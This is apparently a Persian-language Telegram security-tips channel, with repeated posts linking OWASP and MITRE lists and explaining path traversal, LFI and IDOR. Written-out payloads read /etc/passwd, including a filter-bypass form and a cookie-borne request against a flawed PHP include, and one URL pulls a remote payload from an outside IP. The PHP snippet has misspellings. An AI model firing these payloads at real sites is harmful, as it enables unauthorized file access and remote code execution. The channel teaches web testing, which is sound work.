🔺دو وب سایت معتبر برای معرفی اسیب پذیری ها mitre و owasp هست که هر ساله لیست بیشترین اسیب پذیری ها را منتشر میکنند.
🔎در اینجا میتوانید 25 اسیب پذیری درسال 2023 توسط mitre منتشر شده را مشاهده کنید:
https://cwe.mitre.org/data/definitions/1425.html
🔎در اینجا میتوانید 10 اسیب پذیری برتر وب سایت owasp را مشاهده کنید.
https://owasp.org/www-project-top-ten/
🔎ویک لیست جامع از اسیب پذیری از نظر owasp :
https://owasp.org/www-community/vulnerabilities/
#vulnerabilities #mitre #owasp
🌐@sec_hint
🔎در اینجا میتوانید 25 اسیب پذیری درسال 2023 توسط mitre منتشر شده را مشاهده کنید:
https://cwe.mitre.org/data/definitions/1425.html
🔎در اینجا میتوانید 10 اسیب پذیری برتر وب سایت owasp را مشاهده کنید.
https://owasp.org/www-project-top-ten/
🔎ویک لیست جامع از اسیب پذیری از نظر owasp :
https://owasp.org/www-community/vulnerabilities/
#vulnerabilities #mitre #owasp
🌐@sec_hint
cwe.mitre.org
CWE -
CWE-1425: Weaknesses in the 2023 CWE Top 25 Most Dangerous Software Weaknesses (4.17)
CWE-1425: Weaknesses in the 2023 CWE Top 25 Most Dangerous Software Weaknesses (4.17)
Common Weakness Enumeration (CWE) is a list of software and hardware weaknesses.
👍2
این نمودار هم خیلی جالبه، روند برخی اسیب پذیری هارو از سال 2013 تا االان رو نمایش میده :
جالبه که XSS بیشترین رشد رو توی این چند سال اخیر داشته 🤔
و میانگین اسیب پذیری ها هم کمتر شده 🫠
https://www.cvedetails.com/
#vulnerabilities
🌐@sec_hint
جالبه که XSS بیشترین رشد رو توی این چند سال اخیر داشته 🤔
و میانگین اسیب پذیری ها هم کمتر شده 🫠
https://www.cvedetails.com/
#vulnerabilities
🌐@sec_hint
Cvedetails
CVE security vulnerability database. Security vulnerabilities, exploits, references and more
CVEDetails.com is a vulnerability intelligence solution providing CVE security vulnerability database, exploits, advisories, product and CVE risk scores, attack surface intelligence, open source vulnerabilities, code changes, vulnerabilities affecting your…
👍2
⚠️ یکی از سناریوهای تست CSRF، هدر X_CSRFToken هست که باید چک کنیم بود و نبودش ...تاثیر داره یا نداره 🤔
https://medium.com/@mohamedajimi59/csrf-in-instagram-461cbba286a
#CSRF
#vulnerabilities
#writeup
#رایتاپ
@sec_hint
https://medium.com/@mohamedajimi59/csrf-in-instagram-461cbba286a
#CSRF
#vulnerabilities
#writeup
#رایتاپ
@sec_hint
Medium
CSRF in Instagram
Description/Impact:
👍2❤1
🕷Path Traversal
که به Directory Traversal هم معروف است. این امکان رو به هکر میدهد که به هر فایل و دایرکتوری دلخواه روی وب اپلیکیشن دسترسی پیدا کند. و فایل های سرور را تغییر دهد.
چطوری میتوان تست کرد :
با بررسی سورس صفحه و تست لینک های عکس ها و فایل هایی که در سورس موجود هست. مثلا این لینک را مشاهده کردید
http://example.com/view?picture=image.png
با استفاده از /.. در سرور لینوکسی و \.. در سرور ویندوزی میتوان در دایرکتوری ها پیمایش کرد و به فایل و دایرکتوری خاصی رسید مثلا
http://example.com/view?picture=../../etc/passwd
بعضی مواقع /.. فیلتر میشود باید انرا بایپس کرد :
1-....//....//etc/passwd
2-use URL encoding
3-start of path validation
یک کد نا امن که باعث ایجاد این آسیب پذیری می شود:
که با فرستادن درخواست زیر میتوان به فایل مهم etc/passwd دسترسی پیدا کرد
#vulnerabilities #path_treversal
@sec_hint
که به Directory Traversal هم معروف است. این امکان رو به هکر میدهد که به هر فایل و دایرکتوری دلخواه روی وب اپلیکیشن دسترسی پیدا کند. و فایل های سرور را تغییر دهد.
چطوری میتوان تست کرد :
با بررسی سورس صفحه و تست لینک های عکس ها و فایل هایی که در سورس موجود هست. مثلا این لینک را مشاهده کردید
http://example.com/view?picture=image.png
با استفاده از /.. در سرور لینوکسی و \.. در سرور ویندوزی میتوان در دایرکتوری ها پیمایش کرد و به فایل و دایرکتوری خاصی رسید مثلا
http://example.com/view?picture=../../etc/passwd
بعضی مواقع /.. فیلتر میشود باید انرا بایپس کرد :
1-....//....//etc/passwd
2-use URL encoding
3-start of path validation
یک کد نا امن که باعث ایجاد این آسیب پذیری می شود:
<?php
$template= 'example.php';
if (is_set($_COOKIE['template']))
$template= $_COOKIE['template'];
incude("/home/users/phpguru/template".$template);
که با فرستادن درخواست زیر میتوان به فایل مهم etc/passwd دسترسی پیدا کرد
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
#vulnerabilities #path_treversal
@sec_hint
👍5
🔺تکمیلی پست قبل
آسیب پذیری LFI یا (Local File Inclusion) بسیار شبیه Path traversal است. (روش تست و بایپس ) اما تفاوت ریزی دارند:
در LFI شما میتونید هم به فایل های داخل سرور دسترسی پیدا کنید و اجرا (execute) کنید و هم فایل های سرور دیگری را اجرا کنید :
مثلا شما در سرور خود فایلی دارید که اطلاعات phpinfo() را نمایش میدهد حال در سایت آسیب پذیر میتوانید این 👇🏻 تست کنید
که در صفحه سایت payload.txt اجرا میشود و اطلاعات phpinfo نمایش داده میشود.
این درحالی است که درPath traversal فقط فایل های داخل وب سرور سایت را میتوان خواند. (فایلی اجرا (execute) نمیشود)
-چرا از /.. استفاده میشود؟ اگر به پیمایش داخل دایرکتوری های لینوکس آشنایی داشته باشید برای تغییر دایرکتوری یا رفتن به دایرکتوری root از /.. استفاده میشود در این نوع اسیب پذیری ها هم چون در حال پیمایش بین دایرکتوری ها هستیم از این کاراکتر ها استفاده میکنیم و به همین علت هم در سرور های ویندوزی از \.. استفاده میکنیم
#vulnerabilities #path_treversal #LFI
@sec_hint
آسیب پذیری LFI یا (Local File Inclusion) بسیار شبیه Path traversal است. (روش تست و بایپس ) اما تفاوت ریزی دارند:
در LFI شما میتونید هم به فایل های داخل سرور دسترسی پیدا کنید و اجرا (execute) کنید و هم فایل های سرور دیگری را اجرا کنید :
مثلا شما در سرور خود فایلی دارید که اطلاعات phpinfo() را نمایش میدهد حال در سایت آسیب پذیر میتوانید این 👇🏻 تست کنید
http://example.com/view?picture=http://20.20.20.20:8080/payload.txt
که در صفحه سایت payload.txt اجرا میشود و اطلاعات phpinfo نمایش داده میشود.
این درحالی است که درPath traversal فقط فایل های داخل وب سرور سایت را میتوان خواند. (فایلی اجرا (execute) نمیشود)
-چرا از /.. استفاده میشود؟ اگر به پیمایش داخل دایرکتوری های لینوکس آشنایی داشته باشید برای تغییر دایرکتوری یا رفتن به دایرکتوری root از /.. استفاده میشود در این نوع اسیب پذیری ها هم چون در حال پیمایش بین دایرکتوری ها هستیم از این کاراکتر ها استفاده میکنیم و به همین علت هم در سرور های ویندوزی از \.. استفاده میکنیم
#vulnerabilities #path_treversal #LFI
@sec_hint
👍4❤1
🕷Insecure Direct Object Reference (IDOR)
اپلیکیشن بدون تصدیق هویت کاربر اجازه دسترسی به اسناد و فایل های حساس را میدهد و مهاجم میتواند اطلاعات وب اپلیکیشن را تغییر دهد.
انواع مختلف IDOR:
1-URL Tampering:
در نوار آدرس مرورگر، پارامتری قرار دارد که مهاجم با تغییر این پارامتر میتواند به اطلاعات حساس صفحه ی دیگری دسترسی پیدا کند.مثلا:
http://example.com/profile?user_id=101
این url اطلاعات یوزر 101 را نمایش میدهد، حال مهاجم با تغییر user_id=101 به user_id=103 به اطلاعات یوزر 103 دسترسی پیدا میکند. در اینجا باید اپلیکیشن سطح مجوزهای هر کاربر را بررسی کرده و به کاربرهای غیرمجاز اجازه ی دسترسی ندهد .
*بعضی اپلیکیشن ها این مقدار را رمزنگاری میکنند که با فهمیدن الگوریتم رمزنگاری مقدار جدید را با ان رمز کرده و در مقدار پارامتر قرار میدهند.به عنوان مثال:
http://example.com/profile?user_id=mpts
مهاجم متوجه میشود که با base64 مقدار پارامتر رمز شده است سپس مقدار ورودی 103 را با base64 رمزگذاری میکند و سپس در ادرس قرار میدهد.
2-Directory Traversal:
مهاجم به فایل ها و اسناد مهم دسترسی پیدا میکند و اپلیکیشن هیچ مجوزی را چک نمیکند.
3-Body Manipulation:
با بررسی سورس صفحه بعضی input ، radio buttons ،checkbox، ... میبینید که values انها مقدار دهی شدند، که با تغییر دادن مقدار "name" و "value" و با دوباره تایید کردن آن و فرستادن آن به سرور به شما امکان این را میدهد تا user و password اکانت دیگر را تغییر داده و آنرا set کنید. مثلا :
4-Cookie ID Manipulation:
کوکی برای ذخیره ی اطلاعات بین کلاینت و سرور روی مرورگر استفاده میشود و از id های session برای اینکار استفاده میکند اگر برنامه نویس به جای session id از id کاربر برای ذخیره سازی این اطلاعات استفاده کند مهاجم میتواند با تغییر این id ، اطلاعات کاربر دیگری را مشاهده کند .
part1
#IDOR #vulnerabilities
@sec_hint
اپلیکیشن بدون تصدیق هویت کاربر اجازه دسترسی به اسناد و فایل های حساس را میدهد و مهاجم میتواند اطلاعات وب اپلیکیشن را تغییر دهد.
انواع مختلف IDOR:
1-URL Tampering:
در نوار آدرس مرورگر، پارامتری قرار دارد که مهاجم با تغییر این پارامتر میتواند به اطلاعات حساس صفحه ی دیگری دسترسی پیدا کند.مثلا:
http://example.com/profile?user_id=101
این url اطلاعات یوزر 101 را نمایش میدهد، حال مهاجم با تغییر user_id=101 به user_id=103 به اطلاعات یوزر 103 دسترسی پیدا میکند. در اینجا باید اپلیکیشن سطح مجوزهای هر کاربر را بررسی کرده و به کاربرهای غیرمجاز اجازه ی دسترسی ندهد .
*بعضی اپلیکیشن ها این مقدار را رمزنگاری میکنند که با فهمیدن الگوریتم رمزنگاری مقدار جدید را با ان رمز کرده و در مقدار پارامتر قرار میدهند.به عنوان مثال:
http://example.com/profile?user_id=mpts
مهاجم متوجه میشود که با base64 مقدار پارامتر رمز شده است سپس مقدار ورودی 103 را با base64 رمزگذاری میکند و سپس در ادرس قرار میدهد.
2-Directory Traversal:
مهاجم به فایل ها و اسناد مهم دسترسی پیدا میکند و اپلیکیشن هیچ مجوزی را چک نمیکند.
3-Body Manipulation:
با بررسی سورس صفحه بعضی input ، radio buttons ،checkbox، ... میبینید که values انها مقدار دهی شدند، که با تغییر دادن مقدار "name" و "value" و با دوباره تایید کردن آن و فرستادن آن به سرور به شما امکان این را میدهد تا user و password اکانت دیگر را تغییر داده و آنرا set کنید. مثلا :
<form action="/submit_form" method="post">
<input type="text" name="username" value='test'>
<input type="password" name="password" value="567" >
<input type="submit" value="Submit">
</form>
4-Cookie ID Manipulation:
کوکی برای ذخیره ی اطلاعات بین کلاینت و سرور روی مرورگر استفاده میشود و از id های session برای اینکار استفاده میکند اگر برنامه نویس به جای session id از id کاربر برای ذخیره سازی این اطلاعات استفاده کند مهاجم میتواند با تغییر این id ، اطلاعات کاربر دیگری را مشاهده کند .
part1
#IDOR #vulnerabilities
@sec_hint
🔥4👍3